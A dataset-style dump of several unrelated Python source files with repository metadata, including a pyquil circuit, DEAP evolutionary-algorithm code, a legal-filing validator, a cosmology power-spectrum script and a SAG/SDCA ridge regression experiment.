prog += X(3) # number=1
prog += H(1) # number=2
prog += H(2) # number=3
prog += H(3) # number=4
prog += Y(3) # number=12
prog += H(0) # number=5
prog += H(1) # number=6
prog += H(2) # number=7
prog += H(3) # number=8
prog += H(0) # number=9
prog += Y(2) # number=10
prog += Y(2) # number=11
prog += CNOT(1,0) # number=13
prog += H(0) # number=15
prog += CZ(1,0) # number=16
prog += H(1) # number=20
prog += H(2) # number=19
prog += H(0) # number=27
prog += CZ(3,0) # number=28
prog += H(0) # number=29
prog += Z(3) # number=25
prog += CNOT(3,0) # number=26
prog += H(0) # number=17
prog += CNOT(2,0) # number=21
prog += X(1) # number=23
prog += CNOT(2,0) # number=22
# circuit end
return prog
def summrise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('4q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil2055.csv","w")
print(summrise_results(bitstrings),file=writefile)
writefile.close()
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
a630382faf9954faa047953a9d9cd71b7f3b32ca | 75cf6a9fd035883b64ca2309382e0178cf370b43 | /Empirical/python/Artificial-Intelligence-with-Python/Chapter 08/visualization1.py | 87c3154afcfd82ddb65576615f5100e38768a547 | [
"MIT"
] | permissive | ygtfrdes/Program | 171b95b9f32a105185a7bf8ec6c8c1ca9d1eda9d | 1c1e30230f0df50733b160ca73510c41d777edb9 | refs/heads/master | 2022-10-08T13:13:17.861152 | 2019-11-06T04:53:27 | 2019-11-06T04:53:27 | 219,560,170 | 1 | 2 | null | 2022-09-30T19:51:17 | 2019-11-04T17:39:52 | HTML | UTF-8 | Python | false | false | 3,652 | py | #!/usr/bin/python
import numpy as np
import matplotlib.pyplot as plt
from deap import algorithms, base, benchmarks, \
cma, creator, tools
# Function to create a toolbox
def create_toolbox(strategy):
creator.create("FitnessMin", base.Fitness, weights=(-1.0,))
creator.create("Individual", list, fitness=creator.FitnessMin)
toolbox = base.Toolbox()
toolbox.register("evaluate", benchmarks.rastrigin)
# Seeed the random number generator
np.random.seed(7)
toolbox.register("generate", strategy.generate, creator.Individual)
toolbox.register("update", strategy.update)
return toolbox
if __name__ == "__main__":
# Problem size
num_individuals = 10
num_generations = 125
# Create a strategy using CMA-ES algorithm
strategy = cma.Strategy(centroid=[5.0]*num_individuals, sigma=5.0,
lambda_=20*num_individuals)
# Create toolbox based on the above strategy
toolbox = create_toolbox(strategy)
# Create hall of fame object
hall_of_fame = tools.HallOfFame(1)
# Register the relevant stats
stats = tools.Statistics(lambda x: x.fitness.values)
stats.register("avg", np.mean)
stats.register("std", np.std)
stats.register("min", np.min)
stats.register("max", np.max)
logbook = tools.Logbook()
logbook.header = "gen", "evals", "std", "min", "avg", "max"
# Objects that will compile the data
sigma = np.ndarray((num_generations, 1))
axis_ratio = np.ndarray((num_generations, 1))
diagD = np.ndarray((num_generations, num_individuals))
fbest = np.ndarray((num_generations,1))
best = np.ndarray((num_generations, num_individuals))
std = np.ndarray((num_generations, num_individuals))
for gen in range(num_generations):
# Generate a new population
population = toolbox.generate()
# Evaluate the individuals
fitnesses = toolbox.map(toolbox.evaluate, population)
for ind, fit in zip(population, fitnesses):
ind.fitness.values = fit
# Update the strategy with the evaluated individuals
toolbox.update(population)
# Update the hall of fame and the statistics with the
# currently evaluated population
hall_of_fame.update(population)
record = stats.compile(population)
logbook.record(evals=len(population), gen=gen, **record)
print(logbook.stream)
# Save more data along the evolution
sigma[gen] = strategy.sigma
axis_ratio[gen] = max(strategy.diagD)**2/min(strategy.diagD)**2
diagD[gen, :num_individuals] = strategy.diagD**2
fbest[gen] = hall_of_fame[0].fitness.values
best[gen, :num_individuals] = hall_of_fame[0]
std[gen, :num_individuals] = np.std(population, axis=0)
# The x-axis will be the number of evaluations
x = list(range(0, strategy.lambda_ * num_generations, strategy.lambda_))
avg, max_, min_ = logbook.select("avg", "max", "min")
plt.figure()
plt.semilogy(x, avg, "--b")
plt.semilogy(x, max_, "--b")
plt.semilogy(x, min_, "-b")
plt.semilogy(x, fbest, "-c")
plt.semilogy(x, sigma, "-g")
plt.semilogy(x, axis_ratio, "-r")
plt.grid(True)
plt.title("blue: f-values, green: sigma, red: axis ratio")
plt.figure()
plt.plot(x, best)
plt.grid(True)
plt.title("Object Variables")
plt.figure()
plt.semilogy(x, diagD)
plt.grid(True)
plt.title("Scaling (All Main Axes)")
plt.figure()
plt.semilogy(x, std)
plt.grid(True)
plt.title("Standard Deviations in All Coordinates")
plt.show()
| [
"githubfortyuds@gmail.com"
] | githubfortyuds@gmail.com |
46d714e2d63f7b3970e142a75ec299f3918e24ab | 849e95a72f4f380d6b31573a0a13e9eccd288838 | /legal-api/src/legal_api/services/filings/validations/conversion.py | d532b344ec36b6abb0179a0ec37385fccec37ac1 | [
"Apache-2.0"
] | permissive | bcgov/lear | d9b27e2b44ba607ca13878357a62a0623d54ddee | d90f11a7b14411b02c07fe97d2c1fc31cd4a9b32 | refs/heads/main | 2023-09-01T11:26:11.058427 | 2023-08-31T20:25:24 | 2023-08-31T20:25:24 | 168,396,249 | 13 | 117 | Apache-2.0 | 2023-09-14T20:52:02 | 2019-01-30T18:49:09 | Python | UTF-8 | Python | false | false | 1,951 | py | # Copyright © 2022 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Validation for the Conversion filing."""
from http import HTTPStatus # pylint: disable=wrong-import-order
from typing import Dict, Optional
from flask_babel import _ as babel # noqa: N813, I004, I001, I003
from legal_api.errors import Error
from legal_api.models import Business
from legal_api.services.filings.validations.common_validations import validate_name_request
from legal_api.services.filings.validations.registration import validate_offices, validate_party
from ...utils import get_str
def validate(business: Business, filing: Dict) -> Optional[Error]:
"""Validate the Conversion filing."""
filing_type = 'conversion'
if not filing:
return Error(HTTPStatus.BAD_REQUEST, [{'error': babel('A valid filing is required.')}])
legal_type_path = '/filing/business/legalType'
legal_type = get_str(filing, legal_type_path)
if legal_type in [Business.LegalTypes.SOLE_PROP.value, Business.LegalTypes.PARTNERSHIP.value]:
msg = []
if filing.get('filing', {}).get('conversion', {}).get('nameRequest', None):
msg.extend(validate_name_request(filing, legal_type, filing_type))
msg.extend(validate_party(filing, legal_type, filing_type))
msg.extend(validate_offices(filing, filing_type))
if msg:
return Error(HTTPStatus.BAD_REQUEST, msg)
return None
| [
"noreply@github.com"
] | bcgov.noreply@github.com |
1229ce4e6ef1de8ce673b6a08aec76352a73ec7f | 2d5171ac7f2640ed73b48aebf4b96e29d5cad818 | /AtcoderProblems/LevelB/147.py | 9b710ddb2985d2bdea5c4d8cb3a478461ada6650 | [] | no_license | kentahoriuchi/Atcorder | d7b8308424175f32d47f24bb15303695780e1611 | f6449d4e9dc7d92210497e3445515fe95b74c659 | refs/heads/master | 2023-06-06T09:26:46.963642 | 2021-06-13T15:08:04 | 2021-06-13T15:08:04 | 255,396,409 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 151 | py | N = int(input())
S = list(input())
if N%2 == 1:
print('No')
else:
if S[:N//2] == S[N//2:]:
print('Yes')
else:
print('No') | [
"dorahori_108@yahoo.co.jp"
] | dorahori_108@yahoo.co.jp |
771f88b1dd03b5d6e62b5589304c1a9ea8911b90 | 0e1e643e864bcb96cf06f14f4cb559b034e114d0 | /Exps_7_v3/Basic_Pyramid_1ch_model_for_import_BN/pyr_1s/L3/step09_1side_L3.py | 58b490c9fdcdf4bd6b952ed9edb68970d1693d28 | [] | no_license | KongBOy/kong_model2 | 33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307 | 1af20b168ffccf0d5293a393a40a9fa9519410b2 | refs/heads/master | 2022-10-14T03:09:22.543998 | 2022-10-06T11:33:42 | 2022-10-06T11:33:42 | 242,080,692 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,874 | py | #############################################################################################################################################################################################################
#############################################################################################################################################################################################################
### 把 kong_model2 加入 sys.path
import os
from tkinter import S
code_exe_path = os.path.realpath(__file__) ### 目前執行 step10_b.py 的 path
code_exe_path_element = code_exe_path.split("\\") ### 把 path 切分 等等 要找出 kong_model 在第幾層
kong_layer = code_exe_path_element.index("kong_model2") ### 找出 kong_model2 在第幾層
kong_model2_dir = "\\".join(code_exe_path_element[:kong_layer + 1]) ### 定位出 kong_model2 的 dir
import sys ### 把 kong_model2 加入 sys.path
sys.path.append(kong_model2_dir)
# print(__file__.split("\\")[-1])
# print(" code_exe_path:", code_exe_path)
# print(" code_exe_path_element:", code_exe_path_element)
# print(" kong_layer:", kong_layer)
# print(" kong_model2_dir:", kong_model2_dir)
#############################################################################################################################################################################################################
from step08_b_use_G_generate_I_to_M import I_to_M
from step08_b_use_G_generate_0_util import Tight_crop
from step09_c_train_step import Train_step_I_to_M
from step09_d_KModel_builder_combine_step789 import KModel_builder, MODEL_NAME
import time
start_time = time.time()
###############################################################################################################################################################################################
###############################################################################################################################################################################################
########################################################### Block1
### Block1
#########################################################################################
pyramid_1side_1 = [1, 0, 0, 0, 0, 0, 1]
pyramid_1side_2 = [1, 1, 0, 0, 0, 1, 1]
pyramid_1side_3 = [1, 1, 1, 0, 1, 1, 1]
pyramid_1side_4 = [1, 1, 1, 1, 1, 1, 1]
#########################################################################################
ch032_pyramid_1side_1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(norm="bn", out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch= 32, depth_level=3, out_ch=1, unet_acti="sigmoid", conv_block_num=pyramid_1side_1, ch_upper_bound= 2 ** 14)
ch032_pyramid_1side_2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(norm="bn", out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch= 32, depth_level=3, out_ch=1, unet_acti="sigmoid", conv_block_num=pyramid_1side_2, ch_upper_bound= 2 ** 14)
ch032_pyramid_1side_3 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(norm="bn", out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch= 32, depth_level=3, out_ch=1, unet_acti="sigmoid", conv_block_num=pyramid_1side_3, ch_upper_bound= 2 ** 14)
ch032_pyramid_1side_4 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(norm="bn", out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch= 32, depth_level=3, out_ch=1, unet_acti="sigmoid", conv_block_num=pyramid_1side_4, ch_upper_bound= 2 ** 14)
#########################################################################################
###############################################################################################################################################################################################
if(__name__ == "__main__"):
import numpy as np
print("build_model cost time:", time.time() - start_time)
data = np.zeros(shape=(1, 511, 511, 1))
use_model = ch032_pyramid_1side_4
use_model = use_model.build()
result = use_model.generator(data)
print(result.shape)
import tensorflow as tf
import datetime
code_exe_dir = "\\".join(code_exe_path_element[:-1])
log_dir = f"{code_exe_dir}/use_Tensorboard_see_Graph/{datetime.datetime.now().strftime('%Y%m%d-%H%M%S')}"
tboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir)
img_inputs = tf.keras.Input(shape=(511, 511, 1))
use_model.generator(img_inputs)
use_model.generator.compile(optimizer='adam', loss='mae', metrics=['accuracy'])
use_model.generator.fit (data, data, epochs=1, callbacks=[tboard_callback])
print(f"tensorboard --logdir={log_dir}")
| [
"s89334roy@yahoo.com.tw"
] | s89334roy@yahoo.com.tw |
556b47ee9741e6478e72dc7ba357d7f7214ecc55 | f6de805e4e0e169cd82562aca20bfef3b38c8c31 | /apps/users/adminx.py | ed82ab401d80dc903fe1250af5de075c40fee0fa | [] | no_license | Huangkai1008/stuonline | 742ac9b27ea1cda8e2c35bf0425cb076ff0345dc | f874eeeb91433d7d789783347e4ffbb01198da58 | refs/heads/master | 2022-10-26T03:36:40.910069 | 2018-01-08T05:41:15 | 2018-01-08T05:41:29 | 114,594,601 | 0 | 1 | null | 2022-10-18T01:01:58 | 2017-12-18T04:05:32 | Python | UTF-8 | Python | false | false | 1,005 | py | # coding:utf8
import xadmin
from xadmin import views
from .models import EmailVerifyRecord, Banner
class BaseSetting(object):
"""
xadmin全局配置
"""
enable_themes = True
use_bootswatch = True
class GlobalSetting(object):
site_title = "Mooc后台管理系统"
site_footer = "mooc在线"
menu_style = "accordion"
class EmailVerifyRecordAdmin(object):
list_display = ['code', 'email', 'send_type', 'send_time']
search_fields = ['code', 'email', 'send_type']
list_filter = ['code', 'email', 'send_type', 'send_time']
class BannerAdmin(object):
list_display = ['title', 'image', 'url', 'index', 'add_time']
search_fields = ['title', 'image', 'url', 'index']
list_filter = ['title', 'image', 'url', 'index', 'add_time']
xadmin.site.register(EmailVerifyRecord, EmailVerifyRecordAdmin)
xadmin.site.register(Banner, BannerAdmin)
xadmin.site.register(views.BaseAdminView, BaseSetting)
xadmin.site.register(views.CommAdminView, GlobalSetting)
| [
"18778335525@163.com"
] | 18778335525@163.com |
e40c6d6f5675fdbe0d83e5a15f777af2e4f5f6e6 | 13a32b92b1ba8ffb07e810dcc8ccdf1b8b1671ab | /home--tommy--mypy/mypy/lib/python2.7/site-packages/deap/tools/migration.py | c5c5a598b606788966662c951ee1599f7c6f8ab9 | [
"Unlicense"
] | permissive | tommybutler/mlearnpy2 | 8ec52bcd03208c9771d8d02ede8eaa91a95bda30 | 9e5d377d0242ac5eb1e82a357e6701095a8ca1ff | refs/heads/master | 2022-10-24T23:30:18.705329 | 2022-10-17T15:41:37 | 2022-10-17T15:41:37 | 118,529,175 | 0 | 2 | Unlicense | 2022-10-15T23:32:18 | 2018-01-22T23:27:10 | Python | UTF-8 | Python | false | false | 2,764 | py | from __future__ import division
def migRing(populations, k, selection, replacement=None, migarray=None):
"""Perform a ring migration between the *populations*. The migration first
select *k* emigrants from each population using the specified *selection*
operator and then replace *k* individuals from the associated population
in the *migarray* by the emigrants. If no *replacement* operator is
specified, the immigrants will replace the emigrants of the population,
otherwise, the immigrants will replace the individuals selected by the
*replacement* operator. The migration array, if provided, shall contain
each population's index once and only once. If no migration array is
provided, it defaults to a serial ring migration (1 -- 2 -- ... -- n --
1). Selection and replacement function are called using the signature
``selection(populations[i], k)`` and ``replacement(populations[i], k)``.
It is important to note that the replacement strategy must select *k*
**different** individuals. For example, using a traditional tournament for
replacement strategy will thus give undesirable effects, two individuals
will most likely try to enter the same slot.
:param populations: A list of (sub-)populations on which to operate
migration.
:param k: The number of individuals to migrate.
:param selection: The function to use for selection.
:param replacement: The function to use to select which individuals will
be replaced. If :obj:`None` (default) the individuals
that leave the population are directly replaced.
:param migarray: A list of indices indicating where the individuals from
a particular position in the list goes. This defaults
to a ring migration.
"""
nbr_demes = len(populations)
if migarray is None:
migarray = range(1, nbr_demes) + [0]
immigrants = [[] for i in xrange(nbr_demes)]
emigrants = [[] for i in xrange(nbr_demes)]
for from_deme in xrange(nbr_demes):
emigrants[from_deme].extend(selection(populations[from_deme], k))
if replacement is None:
# If no replacement strategy is selected, replace those who migrate
immigrants[from_deme] = emigrants[from_deme]
else:
# Else select those who will be replaced
immigrants[from_deme].extend(replacement(populations[from_deme], k))
for from_deme, to_deme in enumerate(migarray):
for i, immigrant in enumerate(immigrants[to_deme]):
indx = populations[to_deme].index(immigrant)
populations[to_deme][indx] = emigrants[from_deme][i]
__all__ = ['migRing'] | [
"tbutler.github@internetalias.net"
] | tbutler.github@internetalias.net |
8a9780c347a8c98f84d292c41a1fb0567cb89ea7 | 607241e619ca499121106b218a5e00ac5244bda3 | /analysis/plot_power_spectrum_ch_hydro_MPI_enzo.py | 047f5abbf4b31835cfaf40243969c97d0465bc6b | [] | no_license | bvillasen/cosmo_sims | 37caea950c7be0626a5170333bfe734071c58124 | 8b20dc05842a22ea50ceb3d646037d2e66fc8c9b | refs/heads/master | 2020-04-22T23:22:28.670894 | 2020-01-02T23:32:39 | 2020-01-02T23:32:39 | 114,167,239 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,135 | py | import sys
import numpy as np
import matplotlib.pyplot as plt
import h5py as h5
from power_spectrum import get_power_spectrum
dev_dir = '/home/bruno/Desktop/Dropbox/Developer/'
cosmo_dir = dev_dir + 'cosmo_sims/'
toolsDirectory = cosmo_dir + "tools/"
sys.path.extend([toolsDirectory ] )
from load_data_cholla import load_snapshot_data
from load_data_enzo import load_snapshot_enzo
from mpi4py import MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
# dataDir = '/home/bruno/Desktop/data/'
dataDir = '/raid/bruno/data/'
outputsDir = '/home/bruno/cholla/scale_output_files/'
eta = 0.030
beta = 0.25
nPoints = 256
Lbox = 50.0 #Mpc/h
data_name = data_name = 'SIMPLE_PPMP_eta0.035_beta0.00_grav4_clean'
# dataSet = 'PLMP'
enzoDir = dataDir + 'cosmo_sims/enzo/{0}_hydro_50Mpc_HLLC_grav4/h5_files/'.format(nPoints )
# chollaDir = dataDir + 'cosmo_sims/cholla_pm/{1}_hydro_50Mpc/data_enzo_{2}_eta{0:.3f}/'.format( eta, nPoints, reconst )
chollaDir = dataDir + 'cosmo_sims/cholla_pm/{1}_hydro_50Mpc/data_{0}/'.format( data_name, nPoints, )
outDir = dev_dir + 'figures/power_hydro/'
# fileName = outDir + 'ps_{0}_hydro_enzo_{2}_eta{1:.3f}.png'.format( nPoints, eta, reconst )
# set simulation volume dimentions
nz, ny, nx = nPoints, nPoints, nPoints
nCells = nx*ny*nz
h = 0.6766
Lx = Lbox
Ly = Lbox
Lz = Lbox
dx, dy, dz = Lx/(nx), Ly/(ny), Lz/(nz )
n_kSamples = 12
redshift_list = [ 100, 70, 40, 10, 7, 4, 1, 0.6, 0.3, 0 ]
redshift_list.reverse()
outputs_enzo = np.loadtxt( outputsDir + 'outputs_hydro_enzo_256_50Mpc_HLLC_grav4.txt')
z_enzo = 1./(outputs_enzo) - 1
snapshots_enzo = []
for z in redshift_list:
z_diff_enzo = np.abs( z_enzo - z )
index_enzo = np.where( z_diff_enzo == z_diff_enzo.min())[0][0]
snapshots_enzo.append( index_enzo )
snapshots = snapshots_enzo
# #For 128 50Mpc
# # snapshots = [ 0, 2, 4, 7, 10, 13, 16, 22, 24, 27]
#
# # snapshots = [ 0, 2, 4, 7, 10, 13, 16, 20, 25, 30]
#
# # snapshots = [ 0, 2, 4, 7, 10, 13, 16, 20, 24, 38]
# # snapshots = [ 0, 2, 4, 7, 10, 13, 16, 19]
# # snapshots = [ 0, 2, 4]
# n_snapshots = len( snapshots )
n_snapshots = len(snapshots)
if rank >= n_snapshots: exit()
nSnap = snapshots[rank]
n_power_data = 4
ps_all = np.ones( [n_power_data, n_kSamples] )
# ps_all *= rank
print " Cholla: ", nSnap
snapKey = str( nSnap )
# if i not in [9]: continue
data_cholla = load_snapshot_data( snapKey, chollaDir, cool=False, single_file=False )
current_z_ch = data_cholla['current_z']
dens_dm_cholla = data_cholla['dm']['density'][...]
dens_gas_cholla = data_cholla['gas']['density'][...]
ps_dm_cholla, k_vals, count_dm_cholla = get_power_spectrum( dens_dm_cholla, Lbox, nx, ny, nz, dx, dy, dz, n_kSamples=n_kSamples)
ps_gas_cholla, k_vals, count_gas_cholla = get_power_spectrum( dens_gas_cholla, Lbox, nx, ny, nz, dx, dy, dz, n_kSamples=n_kSamples)
ps_all[0] = ps_dm_cholla
ps_all[1] = ps_gas_cholla
print ' Enzo: ', nSnap
data_enzo = load_snapshot_enzo( nSnap, enzoDir, dm=True, cool=False)
current_a_enzo = data_enzo['current_a']
current_z_enzo = data_enzo['current_z']
dens_dm_enzo = data_enzo['dm']['density'][...]
dens_gas_enzo = data_enzo['gas']['density'][...]
ps_dm_enzo, k_vals, count_dm_enzo = get_power_spectrum( dens_dm_enzo, Lbox, nx, ny, nz, dx, dy, dz, n_kSamples=n_kSamples)
ps_gas_enzo, k_vals, count_gas_enzo = get_power_spectrum( dens_gas_enzo, Lbox, nx, ny, nz, dx, dy, dz, n_kSamples=n_kSamples)
ps_all[2] = ps_dm_enzo
ps_all[3] = ps_gas_enzo
send_buf = ps_all
recv_buf = None
if rank == 0:
recv_buf = np.empty ([ n_snapshots, n_power_data, n_kSamples], dtype=np.float64)
comm.Gather(send_buf, recv_buf, root=0)
data_all = recv_buf
send_buf = np.array([current_z_ch])
recv_buf = None
if rank == 0:
recv_buf = np.empty ([ n_snapshots ], dtype=np.float64)
comm.Gather(send_buf, recv_buf, root=0)
current_z_all = recv_buf
if rank != 0: exit()
# print data_all
# print current_z_all
fig = plt.figure(0)
fig.set_size_inches(20,10)
fig.clf()
gs = plt.GridSpec(5, 2)
gs.update(hspace=0.05, wspace=0.08, )
ax1 = plt.subplot(gs[0:4, 0])
ax2 = plt.subplot(gs[4:5, 0])
ax3 = plt.subplot(gs[0:4, 1])
ax4 = plt.subplot(gs[4:5, 1])
# colors = ['b', 'y', 'g', 'c', 'm', 'b', 'y', 'g', 'c', 'm', ]
colors = ['C0', 'C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9']
for i in range(n_snapshots):
ps_dm_cholla = data_all[i,0]
ps_gas_cholla = data_all[i,1]
ps_dm_enzo = data_all[i,2]
ps_gas_enzo = data_all[i,3]
label = 'z = {0:.1f}'.format(current_z_all[i])
c = colors[i]
if i == 0:
ax1.plot( k_vals, ps_dm_enzo, '--', c=c, linewidth=1, label='Enzo' )
ax3.plot( k_vals, ps_gas_enzo, '--', c=c, linewidth=1, label='Enzo' )
else:
ax1.plot( k_vals, ps_dm_enzo, '--', c=c, linewidth=1 )
ax3.plot( k_vals, ps_gas_enzo, '--', c=c, linewidth=1 )
#
ax1.plot( k_vals, ps_dm_cholla, c=c, linewidth=2, label=label )
ax3.plot( k_vals, ps_gas_cholla, c=c, linewidth=2, label=label )
error_dm = (ps_dm_cholla - ps_dm_enzo) / ps_dm_enzo
error_gas = (ps_gas_cholla - ps_gas_enzo) / ps_gas_enzo
ax2.plot( k_vals, error_dm , c=c, alpha=0.9)
ax4.plot( k_vals, error_gas , c=c, alpha=0.9)
ax2.axhline( y=0., color='r', linestyle='--', )
ax2.set_ylim( -1, 1)
ax4.axhline( y=0., color='r', linestyle='--', )
ax4.set_ylim( -1, 1)
ax1.set_ylabel( r'$P(k) $', fontsize=17)
ax2.set_ylabel( 'Difference', fontsize=15)
ax1.legend( loc=3)
ax2.set_xlabel( r'$k \, \, [h Mpc^{-1}]$', fontsize=17)
ax3.legend( loc=3)
ax2.set_xlabel( r'$k \, \, [h Mpc^{-1}]$', fontsize=17)
ax4.set_xlabel( r'$k \, \, [h Mpc^{-1}]$', fontsize=17)
ax1.set_xscale('log')
ax1.set_yscale('log')
ax3.set_xscale('log')
ax3.set_yscale('log')
ax2.set_xscale('log')
ax4.set_xscale('log')
ax1.set_title('DM Power Spectrum', fontsize=18)
ax3.set_title('Gas Power Spectrum ', fontsize=18)
data_name = data_name = 'SIMPLE_PPMP_eta0.005_beta0.00_grav4'
fig.suptitle(r' {0} '.format(data_name), fontsize=20, y=0.95)
fileName = outDir + 'ps_{0}_hydro_enzo_{1}.png'.format( nPoints, data_name )
# ax1.xlim()
fig.savefig( fileName, pad_inches=0.1, bbox_inches='tight', dpi=80)
print 'Saved Image: ', fileName
| [
"bvillasen@gmail.com"
] | bvillasen@gmail.com |
ae3fc09f862ea7e2d30971709cad0a4ea02cc83f | e84a9b9bf1398f0e78a63ea3c5d50a5263165301 | /ridge.py | 07f327e9bd03ad145265355c94531c53c7a508ba | [] | no_license | theovincent/SAG_vs_SDCA | 6289f8ae90c8db5bc734cc76b362c7d329bd8d06 | 827614d3ef6bbd2355a53ff745879a887e23d5d8 | refs/heads/master | 2022-06-26T10:15:19.746976 | 2020-05-10T12:43:34 | 2020-05-10T12:43:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,355 | py | from pathlib import Path
import numpy as np
import matplotlib.pyplot as plt
# For the data
from src.utils.preprocess import get_houses_data
# For sag method
from src.sag.train_sag import sag_train
from src.sag.test_sag import sag_test
import src.sag.loss.squared_loss as square_sag
from src.sag.accuracy.regression_acc import regression_acc as acc_sag
from src.sag.visualisation.regression_visu import regression_visu as visu_sag
# For sdca method
from src.sdca.train_sdca import sdca_train
from src.sdca.test_sdca import sdca_test
from src.sdca.kernel.polynomial import polynomial_kernel
from src.sdca.kernel.gaussian import gaussian_kernel
from src.sdca.loss.square_loss import square_loss as square_sdca
from src.sdca.steps.square_step import square_step as step_sdca
from src.sdca.accuracy.regression_acc import regression_acc as acc_sdca
from src.sdca.visualisation.sdca_visu import sdca_visu
YOU_WANT_SAG = False
YOU_WANT_SDCA = True
# -- Set the options --
ADD_BIAS = True
POLY_KERNEL = False
# --- Get the data ---
CSV_PATH = Path("data/data.csv")
(ALL_TRAINS, ALL_VALIDS, ALL_TESTS, PRICES_TRAIN, PRICES_VALID, PRICES_TEST, LIST_PREPROCESS) = get_houses_data(CSV_PATH)
# --- SAG ---
# Set the functions, the options and the parameters
FUNCTIONS_SAG = [square_sag, acc_sag, visu_sag]
OPTIONS = [ADD_BIAS, False, False] # [ADD_BIAS, VISUALISATION, SHOW_PLOTS]
PARAM_SAG = np.array([[0.00007, 0.0003], [0.07, 0.3]]) # [LAMBDA, ETA]
if YOU_WANT_SAG:
# -- Training --
print("Train the sag...")
NB_TRAININGS = len(ALL_TRAINS)
ACCURACIES = np.zeros(NB_TRAININGS)
ACCURACY_MAX = 0
LAMBDA_OPT = 0
ETA_OPT = 0
IDX_TRY_OPT = None
for idx_try in range(NB_TRAININGS):
print(LIST_PREPROCESS[idx_try])
# Training with the parameters
RESULTS_SAG = sag_train(ALL_TRAINS[idx_try], PRICES_TRAIN, ALL_VALIDS[idx_try], PRICES_VALID, FUNCTIONS_SAG,
OPTIONS, PARAM_SAG)
(ACCURACY_VALID, LAMBDA, ETA) = RESULTS_SAG
# Update the global parameters
ACCURACIES[idx_try] = ACCURACY_VALID
print("Validation accuracy", ACCURACY_VALID)
if ACCURACY_MAX < ACCURACY_VALID:
ACCURACY_MAX = ACCURACY_VALID
LAMBDA_OPT = LAMBDA
ETA_OPT = ETA
IDX_TRY_OPT = idx_try
# -- Testing with the best parameters --
print("Test the sag...")
PARAMETERS = [ADD_BIAS, LAMBDA_OPT, ETA_OPT]
ACCURACY_TEST = sag_test(ALL_TRAINS[IDX_TRY_OPT], PRICES_TRAIN, ALL_TESTS[IDX_TRY_OPT], PRICES_TEST, square_sag,
acc_sag, PARAMETERS)
print("The accuracy for the test set is :", ACCURACY_TEST)
print("It was made with the preprocessing :", LIST_PREPROCESS[IDX_TRY_OPT])
print("The optimal value of lambda is :", LAMBDA_OPT)
print("The optimal value of eta is :", ETA_OPT)
# Plot the losses
plt.figure()
plt.bar(np.arange(0, NB_TRAININGS, 1), ACCURACIES)
plt.xlabel("Different preprocessing")
plt.ylabel("Validation accuracy")
plt.show()
# --- SDCA ---
# Set the kernel parameters and the functions
if POLY_KERNEL:
KERNEL = polynomial_kernel
else:
KERNEL = gaussian_kernel
FUNCTIONS_SDCA = [square_sdca, step_sdca, POLY_KERNEL, KERNEL, acc_sdca]
# Set the range of the parameters for the optimisation : box, degree or gamma
if POLY_KERNEL:
PARAM_SDCA = np.array([[0.1, 3], [1, 5]])
else:
PARAM_SDCA = np.array([[5, 10], [0.005, 0.009]]) # [BOX, GAMMA]
VISU_SDCA = [False, False, sdca_visu, None, None] # [SHOW_PLOTS, SHOW_VISU, VISUALISATION, POINTS, VALUES]
if YOU_WANT_SDCA:
# -- Training --
print("Train the sdca...")
NB_TRAININGS = len(ALL_TRAINS)
ACCURACIES = np.zeros(NB_TRAININGS)
ACCURACY_MAX = 0
BOX_OPT = 0
PARAM_OPT = 0
IDX_TRY_OPT = None
for idx_try in range(NB_TRAININGS):
print(LIST_PREPROCESS[idx_try])
# Training with the parameters
RESULTS_SDCA = sdca_train(ALL_TRAINS[idx_try], PRICES_TRAIN, ALL_VALIDS[idx_try], PRICES_VALID, FUNCTIONS_SDCA,
VISU_SDCA, PARAM_SDCA)
(ACCURACY_VALID, BOX, KERNEL_PARAM) = RESULTS_SDCA
# Update the global parameters
ACCURACIES[idx_try] = ACCURACY_VALID
print("Validation accuracy", ACCURACY_VALID)
if ACCURACY_MAX < ACCURACY_VALID:
ACCURACY_MAX = ACCURACY_VALID
BOX_OPT = BOX
PARAM_OPT = KERNEL_PARAM
IDX_TRY_OPT = idx_try
# -- Testing with the best parameters --
print("Test the sdca...")
PARAMETERS = [BOX_OPT, PARAM_OPT]
ACCURACY_TEST = sdca_test(ALL_TRAINS[IDX_TRY_OPT], PRICES_TRAIN, ALL_TESTS[IDX_TRY_OPT], PRICES_TEST,
FUNCTIONS_SDCA, PARAMETERS)
print("The accuracy for the test set is :", ACCURACY_TEST)
print("It was made with the preprocessing :", LIST_PREPROCESS[IDX_TRY_OPT])
print("The optimal value of the box is :", BOX_OPT)
if POLY_KERNEL:
print("The optimal degree of the polynomial kernel is :", PARAM_OPT)
else:
print("The optimal gamma of the gaussian kernel is :", PARAM_OPT)
# Plot the losses
plt.figure()
plt.bar(np.arange(0, NB_TRAININGS, 1), ACCURACIES)
plt.xlabel("Different preprocessing")
plt.ylabel("Validation accuracy")
plt.show()
| [
"theo.vincent@eleves.enpc.fr"
